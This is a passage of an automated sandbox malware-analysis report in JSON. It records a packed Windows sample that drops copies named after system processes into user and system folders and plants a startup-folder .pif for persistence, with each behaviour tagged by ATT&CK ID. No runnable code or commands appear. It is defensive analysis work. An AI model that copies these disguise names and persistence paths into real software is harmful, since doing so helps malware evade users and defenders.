\".rsrc\"\n \"WINLOGON.EXE.bin\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"services.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"shell.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4k51k4.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"New Folder.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Data HAPUBWS.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Empty.pif\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"WINLOGON.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C450.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SERVICES.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C452.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"LSASS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"MrHelloween.scr\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C88D.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C740.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C743.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Windows\\4k51k4.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\4k51k4.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" connecting to \"\\ThemeApiPort\"\n \"4k51k4.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"LSASS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\users\\desktop.ini\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\windows\\4k51k4.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\4k51k4.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\windows\\system32\\shell.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\windows\\system32\\iexplorer.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Windows\\4k51k4.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Windows\\System32\\MrHelloween.scr\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 5064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5064)\n \"4k51k4.exe\" queries basic process information of the \"C:\\share\\4K51K4\\Folder.htt\" (UID: 6060)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 6060)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 5888)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 5888)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 4164)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 4164)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe.cfg\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\CRYPTSP.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTSP.dll\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to touch file \"C:\\Windows\\system32\\rsaenh.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe.cfg\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe.Local\\\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" trying to access non-existent file \"C:\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\windows\\4k51k4.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\4k51k4.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\lsass.exe\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\smss.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C450.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C452.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C88D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C740.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C743.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- [targetUID: 00000000-00006060]\n \"Puisi.txt\" has type \"ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: 00000000-00006060]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C889.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005948)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004164)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00006056)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00006056)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00006056)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00002532)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00002532)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00002532)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00003812)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbc76088b640000d0fd7f9a5c6f7700f0fd7f50c7120044d0fd7f00000000400000003f0000002000000000d0fd7f44c71200c15c6f77608276772000000000d0fd7f9a5c6f7700f0fd7f68c7120057896e778083767713176a75d8ebbc76 (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbc7620972f000090fd7f9a5c6f7700f0fd7f50c712004490fd7f00000000400000003f000000200000000090fd7f44c71200c15c6f7760827677200000000090fd7f9a5c6f7700f0fd7f68c7120057896e778083767713176a75d8ebbc76 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbc76a08c25000060fd7f9a5c6f7700f0fd7f50c712004460fd7f00000000400000003f000000200000000060fd7f44c71200c15c6f7760827677200000000060fd7f9a5c6f7700f0fd7f68c7120057896e778083767713176a75d8ebbc76 (UID: 00000000-00005888)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b3a01d01b3a0100163a0100003701e4143a01880000008800000017686e7798173a01ff2b6e7754af6b77a41b3a01ac0119000000190000003701c06d37011200a20019040000c06d370150163a01100000000000000013009d0019040000c06d3701 (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21b4501d01b45010016450100004201e4144501880000008800000017686e7798174501ff2b6e773fa16b77a41b4501ac0126000000260000004201c06d42011400980019040000c06d42015016450110000000000000001500930019040000c06d4201 (UID: 00000000-00005948)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750596e7798010000a0010000d21bcf01d01bcf010016cf010000cc01e414cf01880000008800000017686e779817cf01ff2b6e77cf9a6b77a41bcf01ac011600000016000000cc01c06dcc0116008e009c020000c06dcc015016cf011000000000000000170089009c020000c06dcc01 (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbc7650bc1a0000f0fd7f9a5c6f7700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15c6f77608276772000000000f0fd7f9a5c6f7700e0fd7f68c7120057896e778083767713176a75d8ebbc76 (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 